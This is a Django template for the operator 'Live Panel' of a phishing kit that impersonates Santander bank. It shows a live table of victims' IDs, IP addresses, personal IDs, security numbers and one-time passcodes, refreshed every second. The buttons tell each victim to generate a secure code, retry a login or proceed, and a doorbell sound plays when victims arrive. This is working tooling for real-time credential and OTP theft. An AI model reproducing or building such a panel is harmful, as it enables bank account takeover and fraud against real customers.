{% extends 'base.html' %}
{% load static %}
{% block content %}

<style>
  
button{

background: transparent;

color: white;

border: none;

border-radius: 5px

}

table{

background: #ec0000;
color:white !important;
}


tr{

color: #ec0000;
background: white

}

tr:odd{

color: #ec0000;
background: white

}

td{
color: white


}


button:hover{

background: white;

color: #ec0000;


}


</style>

<script>

  function changeMe(){
  
this.id = 'Nae'


}

  
</script>

<div style="background: #ec0000">
<h1 style="color: white">&nbsp;&nbsp;&nbsp;<img alt="Santander Image" class="img-fluid Bitmap header-logo-santander" src="{% static 'styles/navbarimg.png' %}" width = "130px" > &nbsp;&nbsp;&nbsp;&nbsp;Live Panel</h1>
<hr>
</div>
<table class="table table">
  <thead>
    <tr>
      <th scope="col">#Victim Id</th>
      <th scope="col">#Victim Ip</th>
      <th scope="col" id="ud">Personal Id</th>
      <th scope="col">#Security Number</th>
      <th scope="col">Generate Secure Code</th>
      <th scope="col">#OTP</th>
      <th scope="col">Correct</th>
      <th scope="col">False</th>
      <th scope="col">PING</th>
      <th scope="col">DELETE</th>

   
</tr>
  </thead>

<tbody id="display">
       
        </tbody>
</table>

{% block javascript %}

<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
  
<script>
    
$(document).ready(function(){

setInterval(function()


{



$.ajax({


type: 'GET',
 
 url: '{% url "getUsers" %}',
 


success: function(response){



$("#display").empty();


   for (var key in response.users){

    function logit(){

       console.log(response.users[key].userId)
}
      var temp="<tr><th scope='row'  style='color:white;background: #ec0000;' id=id"+response.users[key].userId+" >"+response.users[key].userId+"</th><td style='color:white;background: #ec0000;'>"+response.users[key].ip_addr+"</td><td style='color:white;background: #ec0000;'>"+response.users[key].PersonalId+"</td><td style='color:white;background: #ec0000;'>"+response.users[key].securityNumber+"</td><td style='color:white;background: #ec0000;'><button onclick='appPlease("+response.users[key].userId+")'>GENERATE</button></td><td style='color:white;background: #ec0000;'>"+response.users[key].otp+"</td><td style='color:white;background: #ec0000;'><button onclick='userProceed("+response.users[key].userId+")'>PROCEED</button></td><td style='color:white;background: #ec0000;'><button onclick='tryAgain("+response.users[key].userId+")'>TRY AGAIN</button></td><td style='color:white;background: #ec0000;'><button onclick='statusCheck("+response.users[key].userId+")'>PING</button></td><td style='color:white;background: #ec0000;'><button onclick='deleteUser("+response.users[key].userId+")'>DELETE</button></td></tr>";

    

        $("#display").append(temp);






   }

},

error: function(response){



alert("NO DATA FOUND");



}





});




},1000);







});

</script>
<script>



  </script>
<script>

function deleteUser(userId) {
var action = confirm("Are you sure you want to delete this user?");
  if (action != false) {
    $.ajax({
        url: '{% url "DeleteUsers" %}',
        data: {
            'userId': userId,
        },
        dataType: 'json',
        success: function (data) {
            if (data.deleted) {
              
            }
        }
    });
  }
}




  </script>
  <script>

function statusCheck(userId) {



    console.log(userId)
    $.ajax({
        type: 'GET',
        url: '{% url "StatusCheck" %}',
        data: {
            'userId': userId,
        },
        dataType: 'json',
        success: function (data) {
            if (data.online) {


              alert('User is online !')
              
            }else{



  alert('User is offline !')

            }
        },error: function(data){




  alert('User is offline !')



}
    }


    );
  }




  </script>
  <script>

function tryAgain(userId) {
var action = confirm("ARE YOU SURE YOU WANT THE USER TO TRY AGAIN ?");
var error = 'True'
  if (action != false) {
    $.ajax({

        url: '{% url "CheckLogin" %}',
        data: {
            'userId': userId,
            'error': error,
        },
        dataType: 'json',
        success: function (data) {
            if (data.check) {
              alert('USER ' + data.alert + ' IS TRYING AGAIN');
            }
        }
    });
  }
}




  </script>
    <script>

function appPlease(userId) {
var action = confirm("ARE YOU SURE YOU WANT THE USER TO GENERATE A SECURE CODE ?");
var error = 'True'
  if (action != false) {
    $.ajax({

        url: '{% url "AppPlease" %}',
        data: {
            'userId': userId,
            'error': error,
        },
        dataType: 'json',
        success: function (data) {
            if (data.app) {
              alert('USER ' + data.alert + ' IS TRYING GENERATING A SECURE CODE');
            }
        }
    });
  }
}




  </script>
  <script>

function userProceed(userId) {
var action = confirm("ARE YOU SURE THE LOGIN IS CORRECT ?");
  var error = 'True'
  if (action != false) {
    $.ajax({

        url: '{% url "ProoceedUserLogin" %}',
        data: {
            'userId': userId,

            'error': error,
            
        },
        dataType: 'json',
        success: function (data) {
            if (data.check) {
              alert('USER ' + data.alert + ' IS PROCEEDING');
            }
        }
    });
  }
}




  </script>

<script>
function beep() {
    var snd = new Audio("http://soundbible.com/mp3/Door Bell-SoundBible.com-1986366504.mp3");  
    snd.play();
}

var i = 0
</script>
<script>
    


$(document).ready(function(){



setInterval(function()


{




$.ajax({


type: 'GET',
 
 url: '{% url "PlaySound" %}',


 


success: function(response){

  
if(response.times){





while( i < response.times){

beep()
 
 i++

}

 }  

},

error: function(response){



alert('flop')



}





});




},1000);







});

</script>



{% endblock javascript %}
{% endblock %}